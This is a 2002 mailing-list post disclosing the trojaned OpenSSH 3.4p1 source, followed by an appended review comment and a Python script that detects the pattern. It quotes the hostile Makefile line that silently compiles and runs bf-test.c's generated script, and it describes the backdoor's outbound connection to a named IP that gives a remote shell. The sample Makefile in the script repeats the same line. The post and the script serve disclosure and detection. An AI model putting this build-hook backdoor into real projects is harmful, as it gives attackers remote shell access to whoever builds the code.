Firewall Wizards mailing list archives
Re: OpenSSH 3.4p1 possibly trojaned
From: hennings () skiinfo com
Date: 01 Aug 2002 14:46:44 +0200
| It would appear that the OpenSSH code for all the non-OpenBSD systems was
| trojaned at some point pretty recently.
(...)
| all: libopenbsd-compat.a
| + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
| ./bf-test.out &
|
| Trojan connection:
|
| 203.62.158.32:6667 (web.snsonline.net)

More details:

The source file (bf-test.c) contains a header with some spelling mistakes, and then blocks of binary data. When run, the binary block is deobfuscated and written to a shell script in the current directory and then run from the Makefile.

The generated script contains some C code, which is compiled and then run. It's forking, connecting to 203.62.158.32:6667, and reading commands from the socket: A, D or M. (D execs /bin/sh connected to the socket, A exits, and M seems to make the process sleep for a while.)

Regards
Henning Spjelkavik

--
Skiinfo AS
Christian Krohgsgate 60 Fax: 22114011
0186 Oslo Foretaksnr: 976036859
http://www.webinfo.no/ E-mail: info () webinfo no

_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
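Review bot: the `all:` recipe should not execute anything the build itself generates. The added line runs `./bf-test`, redirects its output to `bf-test.out` and passes that file to `sh` with a trailing `&`, while the leading `@` keeps the command out of make's output. Building `libopenbsd-compat.a` needs none of this, so the line should be dropped and bf-test.c read before anything is built from this tree.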
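A defensive check for the recipe pattern described in the message above, as an added example that is not part of the original post or of OpenSSH: it flags Makefile recipe lines that run a program from the build tree and hand its output to a shell. The sample Makefile is constructed from the quoted line plus one ordinary rule; the function names and the heuristics are assumptions of this example.

```python
import re

# Constructed sample: the recipe line quoted in the post plus one ordinary rule.
SAMPLE_MAKEFILE = (
    "all: libopenbsd-compat.a\n"
    "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &\n"
    "libopenbsd-compat.a: $(OBJS)\n"
    "\t$(AR) rv $@ $(OBJS)\n"
)
SHELL = r"(?:/bin/)?(?:sh|bash|ksh)"  # interpreters treated as "a shell" (assumption)

def recipe_lines(text):
    """Yield (line number, recipe text) for tab-indented lines, joining '\\' continuations."""
    buf, start = "", 0
    for no, raw in enumerate(text.splitlines(), 1):
        if buf or raw.startswith("\t"):
            start = start if buf else no
            buf += raw.strip()
            if buf.endswith("\\"):
                buf = buf[:-1] + " "
                continue
            yield start, buf
            buf = ""

def audit(line):
    """Return the reasons a recipe line looks like build-time execution of generated shell code."""
    reasons = []
    cmd = line.lstrip("@-+ \t")  # drop make's per-line prefixes before matching
    if re.search(rf"\./\S+[^;|]*\|\s*{SHELL}\b", cmd):
        reasons.append("output of a local program piped into a shell")
    captured = re.search(r"\./[^\s;>|]+[^;|>]*>\s*([^\s;&|]+)", cmd)
    if captured:
        out = re.escape(captured.group(1))
        if re.search(rf"(?:^|[;&|]\s*){SHELL}\s+(?:\./)?{out}(?=\s|;|&|$)", cmd):
            reasons.append("output of a local program saved to a file and run by a shell")
    if reasons:  # aggravating details only matter once the core pattern is present
        if line.lstrip().startswith("@"):
            reasons.append("command echo suppressed with @")
        if re.search(r"(?<!&)&\s*$", cmd):
            reasons.append("left running in the background")
    return reasons

def scan(text):
    """Map line number -> reasons for every flagged recipe line in a Makefile."""
    hits = ((no, audit(line)) for no, line in recipe_lines(text))
    return {no: why for no, why in hits if why}

if __name__ == "__main__":
    print(scan(SAMPLE_MAKEFILE))
```

The check is a heuristic over recipe text only; it does not expand make variables or follow included files.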